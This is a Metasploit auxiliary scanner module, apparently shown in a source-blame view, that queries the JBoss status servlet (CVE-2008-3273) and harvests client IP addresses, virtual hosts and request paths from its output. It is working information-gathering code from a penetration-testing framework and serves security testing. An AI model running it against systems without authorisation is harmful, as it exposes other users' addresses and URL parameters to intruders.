metasploit-framework/modules/auxiliary/scanner/http/jboss_status.rb

113 lines
3.2 KiB
Ruby
Raw Normal View History

2014-02-15 16:46:52 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
2014-03-28 21:04:43 +00:00
'Name' => 'JBoss Status Servlet Information Gathering',
2014-02-15 16:46:52 +00:00
'Description' => %q{
2014-03-28 21:04:43 +00:00
This module queries the JBoss status servlet to collect sensitive
information, including URL paths, GET parameters and client IP addresses.
2014-03-28 21:04:43 +00:00
This module has been tested against JBoss 4.0, 4.2.2 and 4.2.3.
2014-02-15 16:46:52 +00:00
},
'References' =>
[
['CVE', '2008-3273'],
['URL', 'http://seclists.org/fulldisclosure/2011/Sep/139'],
['URL', 'https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf'],
2014-03-28 21:04:43 +00:00
['URL', 'http://www.slideshare.net/chrisgates/lares-fromlowtopwned']
2014-02-15 16:46:52 +00:00
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(8080),
2014-03-28 21:04:43 +00:00
OptString.new('TARGETURI', [ true, 'The JBoss status servlet URI path', '/status'])
2014-02-15 16:46:52 +00:00
], self.class)
end
def run_host(target_host)
2014-03-28 21:04:43 +00:00
jpath = normalize_uri(target_uri.to_s)
2014-02-15 16:46:52 +00:00
2014-03-28 21:04:43 +00:00
@requests = []
vprint_status("#{rhost}:#{rport} - Collecting data through #{jpath}...")
res = send_request_raw({
'uri' => jpath,
'method' => 'GET'
})
# detect JBoss application server
if res and res.code == 200 and res.body.match(/<title>Tomcat Status<\/title>/)
http_fingerprint({:response => res})
2014-02-15 16:46:52 +00:00
2014-03-28 21:04:43 +00:00
html_rows = res.body.split(/<strong>/)
html_rows.each do |row|
#Stage Time B Sent B Recv Client VHost Request
#K 150463510 ms ? ? 1.2.3.4 ? ?
# filter client requests
if row.match(/(.*)<\/strong><\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td nowrap>(.*)<\/td><td nowrap>(.*)<\/td><\/tr>/)
j_src = $5
j_dst = $6
j_path = $7
@requests << [j_src, j_dst, j_path]
end
2014-02-15 16:46:52 +00:00
end
2014-03-28 21:04:43 +00:00
elsif res and res.code == 401
vprint_error("#{rhost}:#{rport} - Authentication is required")
return
elsif res and res.code == 403
vprint_error("#{rhost}:#{rport} - Forbidden")
return
else
vprint_error("#{rhost}:#{rport} - Unknown error")
return
2014-02-15 16:46:52 +00:00
end
# show results
2014-03-28 21:04:43 +00:00
unless @requests.empty?
show_results(target_host)
end
end
def show_results(target_host)
print_good("#{rhost}:#{rport} JBoss application server found")
req_table = Rex::Ui::Text::Table.new(
'Header' => 'JBoss application server requests',
'Indent' => 1,
'Columns' => ['Client', 'Vhost target', 'Request']
)
2014-02-15 16:46:52 +00:00
2014-03-28 21:04:43 +00:00
@requests.each do |r|
req_table << r
2014-02-15 16:46:52 +00:00
report_note({
:host => target_host,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
:port => rport,
2014-03-28 21:04:43 +00:00
:type => 'JBoss application server info',
:data => "#{rhost}:#{rport} #{r[2]}"
2014-02-15 16:46:52 +00:00
})
end
2014-03-28 21:04:43 +00:00
print_line
print_line(req_table.to_s)
2014-02-15 16:46:52 +00:00
end
end